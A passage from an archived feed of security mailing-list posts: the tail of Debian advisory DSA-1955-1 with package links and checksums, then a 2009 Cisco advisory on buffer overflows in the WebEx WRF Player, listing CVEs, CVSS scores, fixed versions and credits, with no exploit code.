&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager-applet/network-manager-applet_0.6.6.orig.tar.gz&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager-applet/network-manager-applet_0.6.6.orig.tar.gz&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 781511 16e95a3515e4255d034b14045a9effd5
&lt;br&gt;&lt;br&gt;alpha architecture (DEC Alpha)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager-applet/network-manager-gnome_0.6.6-4+lenny1_alpha.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager-applet/network-manager-gnome_0.6.6-4+lenny1_alpha.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 346500 420e6ae0bbf0086e032e05da9c554e6d
&lt;br&gt;&lt;br&gt;amd64 architecture (AMD x86_64 (AMD64))
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager-applet/network-manager-gnome_0.6.6-4+lenny1_amd64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager-applet/network-manager-gnome_0.6.6-4+lenny1_amd64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 337408 38262fc0d2cadaea090e0098f7c24c67
&lt;br&gt;&lt;br&gt;hppa architecture (HP PA RISC)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager-applet/network-manager-gnome_0.6.6-4+lenny1_hppa.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager-applet/network-manager-gnome_0.6.6-4+lenny1_hppa.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 341614 509c38929b6588de102b937fcde5e424
&lt;br&gt;&lt;br&gt;i386 architecture (Intel ia32)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager-applet/network-manager-gnome_0.6.6-4+lenny1_i386.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager-applet/network-manager-gnome_0.6.6-4+lenny1_i386.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 331344 993767ed8f55910cced53c641074b338
&lt;br&gt;&lt;br&gt;ia64 architecture (Intel ia64)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager-applet/network-manager-gnome_0.6.6-4+lenny1_ia64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager-applet/network-manager-gnome_0.6.6-4+lenny1_ia64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 379256 f662db05a7011e7e9c4ac46c39b960c6
&lt;br&gt;&lt;br&gt;mips architecture (MIPS (Big Endian))
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager-applet/network-manager-gnome_0.6.6-4+lenny1_mips.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager-applet/network-manager-gnome_0.6.6-4+lenny1_mips.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 331820 5daf0ed1f11f1848b76b5f48b5e771a9
&lt;br&gt;&lt;br&gt;mipsel architecture (MIPS (Little Endian))
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager-applet/network-manager-gnome_0.6.6-4+lenny1_mipsel.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager-applet/network-manager-gnome_0.6.6-4+lenny1_mipsel.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 331298 b2cee8325e9908f7e14aeb455e2ad863
&lt;br&gt;&lt;br&gt;powerpc architecture (PowerPC)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager-applet/network-manager-gnome_0.6.6-4+lenny1_powerpc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager-applet/network-manager-gnome_0.6.6-4+lenny1_powerpc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 342226 3b26b9f83aa0c036559f302fb9445fa0
&lt;br&gt;&lt;br&gt;sparc architecture (Sun SPARC/UltraSPARC)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/n/network-manager-applet/network-manager-gnome_0.6.6-4+lenny1_sparc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/n/network-manager-applet/network-manager-gnome_0.6.6-4+lenny1_sparc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 329700 3241f8fd438f725f0526cb628251c4ef
&lt;br&gt;&lt;br&gt;&lt;br&gt;&amp;nbsp; These files will probably be moved into the stable distribution on
&lt;br&gt;&amp;nbsp; its next update.
&lt;br&gt;&lt;br&gt;- ---------------------------------------------------------------------------------
&lt;br&gt;For apt-get: deb &lt;a href=&quot;http://security.debian.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/&lt;/a&gt;&amp;nbsp;stable/updates main
&lt;br&gt;For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
&lt;br&gt;Mailing list: &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26815525&amp;i=1&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;debian-security-announce@...&lt;/a&gt;
&lt;br&gt;Package info: `apt-cache show &amp;lt;pkg&amp;gt;' and &lt;a href=&quot;http://packages.debian.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://packages.debian.org/&lt;/a&gt;&amp;lt;pkg&amp;gt;
&lt;br&gt;-----BEGIN PGP SIGNATURE-----
&lt;br&gt;Version: GnuPG v1.4.10 (GNU/Linux)
&lt;br&gt;&lt;br&gt;iEYEARECAAYFAkspGFgACgkQ62zWxYk/rQcsCQCgo1tTuda8CU6kM12MCuBtVC5S
&lt;br&gt;Ey4AoKHOiALAwGDJQzqsG85V3HjBl7C5
&lt;br&gt;=9Ta6
&lt;br&gt;-----END PGP SIGNATURE-----
&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/-SECURITY---DSA-1955-1--New-network-manager-network-manager-applet-packages-fix-information-disclosure-tp26815525p26815525.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26816378</id>
	<title>Cisco Security Advisory: Multiple Cisco WebEx WRF Player Vulnerabilities</title>
	<published>2009-12-16T08:55:47Z</published>
	<updated>2009-12-16T08:55:47Z</updated>
	<author>
		<name>Cisco Systems Product Security Incident Response Team</name>
	</author>
	<content type="html">-----BEGIN PGP SIGNED MESSAGE-----
&lt;br&gt;Hash: SHA1
&lt;br&gt;&lt;br&gt;Cisco Security Advisory: Multiple Cisco WebEx WRF Player Vulnerabilities
&lt;br&gt;&lt;br&gt;Advisory ID: cisco-sa-20091216-webex
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/warp/public/707/cisco-sa-20091216-webex.shtml&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/warp/public/707/cisco-sa-20091216-webex.shtml&lt;/a&gt;&lt;br&gt;&lt;br&gt;Revision 1.0
&lt;br&gt;&lt;br&gt;For Public Release 2009 December 16 1600 UTC (GMT)
&lt;br&gt;&lt;br&gt;Summary
&lt;br&gt;=======
&lt;br&gt;&lt;br&gt;Multiple buffer overflow vulnerabilities exist in the Cisco WebEx
&lt;br&gt;Recording Format (WRF) Player. In some cases, exploitation of the
&lt;br&gt;vulnerabilities could allow a remote attacker to execute arbitrary code
&lt;br&gt;on the system of a targeted user.
&lt;br&gt;&lt;br&gt;The Cisco WebEx WRF Player is an application that is used to play back
&lt;br&gt;WebEx meeting recordings that have been recorded on the computer of an
&lt;br&gt;on-line meeting attendee. The WRF Player can be automatically installed
&lt;br&gt;when the user accesses a WRF file that is hosted on a WebEx server. The
&lt;br&gt;WRF Player can also be manually installed for offline playback after
&lt;br&gt;downloading the application from www.webex.com.
&lt;br&gt;&lt;br&gt;If the WRF Player was automatically installed, the WebEx WRF Player
&lt;br&gt;will be automatically upgraded to the latest, non-vulnerable version
&lt;br&gt;when users access a WRF file hosted on a WebEx server. If the WebEx
&lt;br&gt;WRF Player was manually installed, users will need to manually install
&lt;br&gt;a new version of the player after downloading the latest version from
&lt;br&gt;www.webex.com.
&lt;br&gt;&lt;br&gt;Cisco has released free software updates that address these
&lt;br&gt;vulnerabilities.
&lt;br&gt;&lt;br&gt;This advisory is posted at
&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/warp/public/707/cisco-sa-20091216-webex.shtml&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/warp/public/707/cisco-sa-20091216-webex.shtml&lt;/a&gt;.
&lt;br&gt;&lt;br&gt;Affected Products
&lt;br&gt;=================
&lt;br&gt;&lt;br&gt;Vulnerable Products
&lt;br&gt;- -------------------
&lt;br&gt;&lt;br&gt;The vulnerabilities disclosed in this advisory affect the Cisco WebEx
&lt;br&gt;WRF Player. Microsoft Windows, Apple Mac OS X, and Linux versions of the
&lt;br&gt;player are affected. Affected versions of the WRF Player are those prior
&lt;br&gt;to the &amp;quot;first fixed&amp;quot; versions, which are shown in the section &amp;quot;Software
&lt;br&gt;Versions and Fixes&amp;quot; of this advisory.
&lt;br&gt;&lt;br&gt;To check if a Cisco WebEx server is running an affected version of the
&lt;br&gt;WebEx client build, users can log in to their Cisco WebEx server and go
&lt;br&gt;to the Support -&amp;gt; Downloads section. The version of the WebEx client
&lt;br&gt;build will be displayed on the right-hand side of the page under &amp;quot;About
&lt;br&gt;Support Center&amp;quot;, for example &amp;quot;Client build: 27.11.0.3328&amp;quot;.
&lt;br&gt;&lt;br&gt;There is no way to check if a manually installed version of the WRF
&lt;br&gt;Player is affected by these vulnerabilities. Therefore, Cisco recommends
&lt;br&gt;that users upgrade to the most current version of the player that is
&lt;br&gt;available from &lt;a href=&quot;http://www.webex.com/downloadplayer.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.webex.com/downloadplayer.html&lt;/a&gt;.
&lt;br&gt;&lt;br&gt;Products Confirmed Not Vulnerable
&lt;br&gt;- ---------------------------------
&lt;br&gt;&lt;br&gt;The Cisco WebEx Player for the WebEx Advanced Recording Format (ARF)
&lt;br&gt;file format is not affected by these vulnerabilities.
&lt;br&gt;&lt;br&gt;No other Cisco products are currently known to be affected by these
&lt;br&gt;vulnerabilities.
&lt;br&gt;&lt;br&gt;Details
&lt;br&gt;=======
&lt;br&gt;&lt;br&gt;The WebEx meeting service is a hosted multimedia conferencing solution
&lt;br&gt;that is managed by and maintained by Cisco WebEx. The WebEx Recording
&lt;br&gt;Format (WRF) is a file format that is used to store WebEx meeting
&lt;br&gt;recordings that have been recorded on the computer of an on-line meeting
&lt;br&gt;attendee. The WRF Player is an application that is used to play back
&lt;br&gt;and edit WRF files (files with .wrf extensions). The WRF Player can be
&lt;br&gt;automatically installed when the user accesses a WRF file that is hosted
&lt;br&gt;on a WebEx server (stream playback mode). The WRF Player can also be
&lt;br&gt;manually installed after downloading the application from www.webex.com
&lt;br&gt;to play back WRF files locally (offline playback mode).
&lt;br&gt;&lt;br&gt;Multiple buffer overflow vulnerabilities exist in the WRF Player. The
&lt;br&gt;vulnerabilities may lead to a crash of the WRF Player application, or in
&lt;br&gt;some cases, lead to remote code execution.
&lt;br&gt;&lt;br&gt;To exploit a vulnerability, a malicious WRF file would need to be opened
&lt;br&gt;by the WRF Player application. An attacker may be able to accomplish
&lt;br&gt;this by providing the malicious WRF file directly to users (for example,
&lt;br&gt;via e-mail), or by convincing users to visit a malicious website. The
&lt;br&gt;vulnerability cannot be triggered by users attending a WebEx meeting.
&lt;br&gt;&lt;br&gt;These vulnerabilities have been assigned the following Common
&lt;br&gt;Vulnerabilities and Exposures (CVE) identifiers:
&lt;br&gt;&lt;br&gt;&amp;nbsp; * CVE-2009-2875
&lt;br&gt;&amp;nbsp; * CVE-2009-2876
&lt;br&gt;&amp;nbsp; * CVE-2009-2877
&lt;br&gt;&amp;nbsp; * CVE-2009-2878
&lt;br&gt;&amp;nbsp; * CVE-2009-2879
&lt;br&gt;&amp;nbsp; * CVE-2009-2880
&lt;br&gt;&lt;br&gt;Vulnerability Scoring Details
&lt;br&gt;=============================
&lt;br&gt;&lt;br&gt;Cisco has provided scores for the vulnerabilities in this advisory based
&lt;br&gt;on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in
&lt;br&gt;this Security Advisory is done in accordance with CVSS version 2.0.
&lt;br&gt;&lt;br&gt;CVSS is a standards-based scoring method that conveys vulnerability
&lt;br&gt;severity and helps determine urgency and priority of response.
&lt;br&gt;&lt;br&gt;Cisco has provided a base and temporal score. Customers can then
&lt;br&gt;compute environmental scores to assist in determining the impact of the
&lt;br&gt;vulnerability in individual networks.
&lt;br&gt;&lt;br&gt;Cisco has provided an FAQ to answer additional questions regarding CVSS
&lt;br&gt;at:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html&lt;/a&gt;&lt;br&gt;&lt;br&gt;Cisco has also provided a CVSS calculator to help compute the
&lt;br&gt;environmental impact for individual networks at:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://intellishield.cisco.com/security/alertmanager/cvss&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://intellishield.cisco.com/security/alertmanager/cvss&lt;/a&gt;&lt;br&gt;&lt;br&gt;* Multiple Cisco WebEx Player Buffer Overflow Vulnerabilities (all
&lt;br&gt;vulnerabilities in this advisory)
&lt;br&gt;&lt;br&gt;CVSS Base Score - 9.3
&lt;br&gt;&amp;nbsp; &amp;nbsp; Access Vector - &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Network
&lt;br&gt;&amp;nbsp; &amp;nbsp; Access Complexity - &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Medium
&lt;br&gt;&amp;nbsp; &amp;nbsp; Authentication - &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; None
&lt;br&gt;&amp;nbsp; &amp;nbsp; Confidentiality Impact - &amp;nbsp; Complete
&lt;br&gt;&amp;nbsp; &amp;nbsp; Integrity Impact - &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Complete
&lt;br&gt;&amp;nbsp; &amp;nbsp; Availability Impact - &amp;nbsp; &amp;nbsp; &amp;nbsp;Complete
&lt;br&gt;&lt;br&gt;CVSS Temporal Score - 7.7
&lt;br&gt;&amp;nbsp; &amp;nbsp; Exploitability - &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Functional
&lt;br&gt;&amp;nbsp; &amp;nbsp; Remediation Level - &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Official-Fix
&lt;br&gt;&amp;nbsp; &amp;nbsp; Report Confidence - &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Confirmed
&lt;br&gt;&lt;br&gt;Impact
&lt;br&gt;======
&lt;br&gt;&lt;br&gt;Successful exploitation of the vulnerabilities described in this
&lt;br&gt;document could result in a crash of the Cisco WebEx WRF Player
&lt;br&gt;application, and in some cases, allow a remote attacker to execute
&lt;br&gt;arbitrary code on the targeted system with the privileges of the user
&lt;br&gt;running the WRF Player application.
&lt;br&gt;&lt;br&gt;Software Versions and Fixes
&lt;br&gt;===========================
&lt;br&gt;&lt;br&gt;The table below contains &amp;quot;First Fixed&amp;quot; information for the Cisco WebEx
&lt;br&gt;WRF Player that is automatically downloaded from a WebEx site when a WRF
&lt;br&gt;hosted on a WebEx site is accessed (stream playback mode). Fixes are
&lt;br&gt;cumulative within a major release so for example, if release 27.10.1 is
&lt;br&gt;fixed, then release 27.10.2 will have the fix too.
&lt;br&gt;&lt;br&gt;+------------------------------------------------------------+
&lt;br&gt;| Platform &amp;nbsp;| Major Release 26.x &amp;nbsp;| Major Release 27.x &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;|-----------+---------------------+--------------------------|
&lt;br&gt;| Microsoft | 26.49.32; available | 27.10.x; available now &amp;nbsp; |
&lt;br&gt;| Windows &amp;nbsp; | now except lockdown | for non-PSO and &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | sites &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | non-lockdown sites &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;|-----------+---------------------+--------------------------|
&lt;br&gt;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | 26.49.35; available | 27.11.8; available now &amp;nbsp; |
&lt;br&gt;| Mac OS X &amp;nbsp;| early February 2010 | for non-PSO and &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | non-lockdown sites &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;|-----------+---------------------+--------------------------|
&lt;br&gt;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | 26.49.35; available | 27.11.8; available now &amp;nbsp; |
&lt;br&gt;| Linux &amp;nbsp; &amp;nbsp; | early February 2010 | for non-PSO and &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | non-lockdown sites &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;+------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;PSO and lockdown sites running 27.x will receive the fixes for these
&lt;br&gt;vulnerabilities during the next emergency patching (EP) cycle. This
&lt;br&gt;advisory will be updated to indicate a specific timeline once one is
&lt;br&gt;available.
&lt;br&gt;&lt;br&gt;If the WRF Player was automatically installed, the WebEx WRF Player will
&lt;br&gt;be automatically upgraded to the latest, non-vulnerable version when
&lt;br&gt;users access a WRF file hosted on a WebEx server.
&lt;br&gt;&lt;br&gt;If the WebEx WRF Player was manually installed, users will need to
&lt;br&gt;manually install a new version of the player after downloading the
&lt;br&gt;latest version from www.webex.com.
&lt;br&gt;&lt;br&gt;Workarounds
&lt;br&gt;===========
&lt;br&gt;&lt;br&gt;There are no workarounds for the vulnerabilities disclosed in this
&lt;br&gt;advisory.
&lt;br&gt;&lt;br&gt;Obtaining Fixed Software
&lt;br&gt;========================
&lt;br&gt;&lt;br&gt;Cisco has released free software updates that address these
&lt;br&gt;vulnerabilities. Prior to deploying software, customers should consult
&lt;br&gt;their maintenance provider or check the software for feature set
&lt;br&gt;compatibility and known issues specific to their environment.
&lt;br&gt;&lt;br&gt;Customers may only install and expect support for the feature
&lt;br&gt;sets they have purchased. By installing, downloading, accessing
&lt;br&gt;or otherwise using such software upgrades, customers agree to be
&lt;br&gt;bound by the terms of Cisco's software license terms found at
&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html&lt;/a&gt;,
&lt;br&gt;or as otherwise set forth at Cisco.com Downloads at
&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/public/sw-center/sw-usingswc.shtml&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/public/sw-center/sw-usingswc.shtml&lt;/a&gt;.
&lt;br&gt;&lt;br&gt;Do not contact &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26816378&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;psirt@...&lt;/a&gt; or &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26816378&amp;i=1&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;security-alert@...&lt;/a&gt; for software
&lt;br&gt;upgrades.
&lt;br&gt;&lt;br&gt;Customers that need additional information can contact WebEx Global
&lt;br&gt;Support Services and Technical Support. WebEx Global Support Services
&lt;br&gt;and Technical Support can be reached through the WebEx support site at
&lt;br&gt;&lt;a href=&quot;http://support.webex.com/support/support-overview.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://support.webex.com/support/support-overview.html&lt;/a&gt;&amp;nbsp;or by phone at
&lt;br&gt;+1-866-229-3239 or +1-408-435-7088.
&lt;br&gt;&lt;br&gt;Customers outside of the United States can reference the following link
&lt;br&gt;for local support numbers:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://support.webex.com/support/phone-numbers.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://support.webex.com/support/phone-numbers.html&lt;/a&gt;&lt;br&gt;&lt;br&gt;Exploitation and Public Announcements
&lt;br&gt;=====================================
&lt;br&gt;&lt;br&gt;The Cisco PSIRT is not aware of malicious use of the vulnerabilities
&lt;br&gt;described in this advisory.
&lt;br&gt;&lt;br&gt;These vulnerabilities were discovered and reported to Cisco by Xiaopeng
&lt;br&gt;Zhang and Zhenhua Liu of Fortinet's FortiGuard Labs. The FortiGuard Labs
&lt;br&gt;advisory is available at &lt;a href=&quot;http://www.fortiguard.com&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.fortiguard.com&lt;/a&gt;. Cisco would like to
&lt;br&gt;thank FortiGuard Labs for reporting these vulnerabilities to us and for
&lt;br&gt;working with us on a coordinated disclosure.
&lt;br&gt;&lt;br&gt;Status of this Notice: FINAL
&lt;br&gt;============================
&lt;br&gt;&lt;br&gt;THIS DOCUMENT IS PROVIDED ON AN &amp;quot;AS IS&amp;quot; BASIS AND DOES NOT IMPLY
&lt;br&gt;ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
&lt;br&gt;MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
&lt;br&gt;INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
&lt;br&gt;AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
&lt;br&gt;DOCUMENT AT ANY TIME.
&lt;br&gt;&lt;br&gt;A stand-alone copy or Paraphrase of the text of this document that omits
&lt;br&gt;the distribution URL in the following section is an uncontrolled copy,
&lt;br&gt;and may lack important information or contain factual errors.
&lt;br&gt;&lt;br&gt;Distribution
&lt;br&gt;============
&lt;br&gt;&lt;br&gt;This advisory is posted on Cisco's worldwide website at:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/warp/public/707/cisco-sa-20091216-webex.shtml&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/warp/public/707/cisco-sa-20091216-webex.shtml&lt;/a&gt;&lt;br&gt;&lt;br&gt;In addition to worldwide web posting, a text version of this notice is
&lt;br&gt;clear-signed with the Cisco PSIRT PGP key and is posted to the following
&lt;br&gt;e-mail and Usenet news recipients.
&lt;br&gt;&lt;br&gt;&amp;nbsp; * &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26816378&amp;i=2&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;cust-security-announce@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; * &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26816378&amp;i=3&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;first-bulletins@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; * &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26816378&amp;i=4&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;bugtraq@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; * &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26816378&amp;i=5&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;vulnwatch@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; * &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26816378&amp;i=6&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;cisco@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; * &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26816378&amp;i=7&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;cisco-nsp@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; * &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26816378&amp;i=8&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;full-disclosure@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; * &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26816378&amp;i=9&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;comp.dcom.sys.cisco@...&lt;/a&gt;
&lt;br&gt;&lt;br&gt;Future updates of this advisory, if any, will be placed on Cisco's
&lt;br&gt;worldwide website, but may or may not be actively announced on mailing
&lt;br&gt;lists or newsgroups. Users concerned about this problem are encouraged
&lt;br&gt;to check the above URL for any updates.
&lt;br&gt;&lt;br&gt;Revision History
&lt;br&gt;================
&lt;br&gt;&lt;br&gt;+------------------------------------------------------------+
&lt;br&gt;| Revision 1.0 | 2009-December-16 &amp;nbsp;| Initial public release &amp;nbsp;|
&lt;br&gt;+------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;Cisco Security Procedures
&lt;br&gt;=========================
&lt;br&gt;&lt;br&gt;Complete information on reporting security vulnerabilities in
&lt;br&gt;Cisco products, obtaining assistance with security incidents, and
&lt;br&gt;registering to receive security information from Cisco, is available
&lt;br&gt;on Cisco's worldwide website at
&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html&lt;/a&gt;.
&lt;br&gt;This includes instructions for press inquiries regarding Cisco security
&lt;br&gt;notices. All Cisco security advisories are available at
&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/go/psirt&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/go/psirt&lt;/a&gt;.
&lt;br&gt;&lt;br&gt;+--------------------------------------------------------------------
&lt;br&gt;Copyright 2008-2009 Cisco Systems, Inc. All rights reserved.
&lt;br&gt;+--------------------------------------------------------------------
&lt;br&gt;&lt;br&gt;Updated: Dec 16, 2009 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Document ID: 110946
&lt;br&gt;-----BEGIN PGP SIGNATURE-----
&lt;br&gt;Version: GnuPG v1.4.9 (GNU/Linux)
&lt;br&gt;&lt;br&gt;iEYEARECAAYFAkspCQMACgkQ86n/Gc8U/uCn+QCeLaUWmiHsetXDoJsynUbgsmHs
&lt;br&gt;IDgAnRhmTkrcs2NhAQ7Dq8+eJqofkHSh
&lt;br&gt;=KaHv
&lt;br&gt;-----END PGP SIGNATURE-----
&lt;br&gt;</content>
